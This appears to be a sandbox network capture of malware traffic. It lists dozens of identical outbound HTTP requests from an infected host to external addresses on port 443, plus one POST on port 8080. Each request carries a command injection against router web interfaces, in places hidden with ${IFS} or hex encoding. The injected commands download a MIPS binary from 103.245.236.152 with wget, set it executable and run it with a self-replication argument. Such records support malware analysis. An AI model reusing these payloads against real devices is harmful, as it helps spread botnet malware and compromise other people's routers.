                                        Jan 14, 2024 16:18:52.640729904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6499192.168.2.1345698156.140.244.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640788078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6500192.168.2.135239271.138.21.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640866995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6501192.168.2.1348396187.153.199.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640887022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6502192.168.2.1354902123.234.74.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.640978098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6503192.168.2.1346414168.41.171.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641000986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6504192.168.2.1336182154.145.201.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641048908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6505192.168.2.1344610211.33.32.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641098976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6506192.168.2.1359044186.196.250.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641135931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6507192.168.2.134200625.86.122.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641165018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6508192.168.2.135502020.109.137.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641197920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6509192.168.2.134462842.98.146.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641242027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6510192.168.2.135807082.149.62.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641284943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6511192.168.2.1336586155.21.46.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641319990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6512192.168.2.1340772167.132.87.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641371012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6513192.168.2.1345150188.201.152.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641403913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6514192.168.2.1332982151.76.113.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641453981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6515192.168.2.1347662133.44.27.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641500950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6516192.168.2.133624032.204.205.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641556978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6517192.168.2.1349970223.170.114.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641587019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6518192.168.2.1333340145.224.26.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641635895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6519192.168.2.1349776141.45.14.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641670942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6520192.168.2.1343180128.132.184.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641696930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6521192.168.2.136073460.169.195.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641751051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6522192.168.2.134049899.67.205.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641781092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6523192.168.2.1349572213.110.71.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641823053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6524192.168.2.1334992145.75.4.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641884089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6525192.168.2.134109665.134.153.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641907930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6526192.168.2.1341356174.204.235.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.641978979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6527192.168.2.1357436168.57.254.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642014980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6528192.168.2.135655298.121.208.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642060041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6529192.168.2.1356464175.140.30.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642112970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6530192.168.2.1355892174.90.249.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642152071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6531192.168.2.133573487.19.217.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642203093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6532192.168.2.1360330123.88.181.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642230988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6533192.168.2.1343752133.65.109.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642290115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6534192.168.2.1356688144.174.24.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642323017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6535192.168.2.1354786189.234.210.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642349958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6536192.168.2.133859275.233.140.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642398119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6537192.168.2.1345082167.106.173.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642453909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6538192.168.2.133500276.59.155.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642482996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6539192.168.2.134564694.17.170.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642510891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6540192.168.2.1357894150.136.161.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642551899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6541192.168.2.1357706169.111.23.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642576933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6542192.168.2.1360346194.43.112.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642616034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6543192.168.2.133630499.241.188.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642658949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6544192.168.2.1343778122.11.161.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642724991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6545192.168.2.1340772198.83.14.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642772913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6546192.168.2.133609618.9.83.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642798901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6547192.168.2.134826037.84.143.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642827034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6548192.168.2.1356324213.106.22.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642865896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6549192.168.2.1346378132.190.249.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642911911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6550192.168.2.1343268142.234.67.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642947912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6551192.168.2.1338054165.103.103.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.642975092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6552192.168.2.135294675.244.239.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643017054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6553192.168.2.134999436.75.131.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643059015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6554192.168.2.134855239.224.9.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643091917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6555192.168.2.1333428202.81.181.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643131971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6556192.168.2.133795873.220.253.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643166065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6557192.168.2.1339656177.178.138.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643188000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6558192.168.2.135562634.211.79.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.643244028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6559192.168.2.1334338172.124.90.1738080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.317575932 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
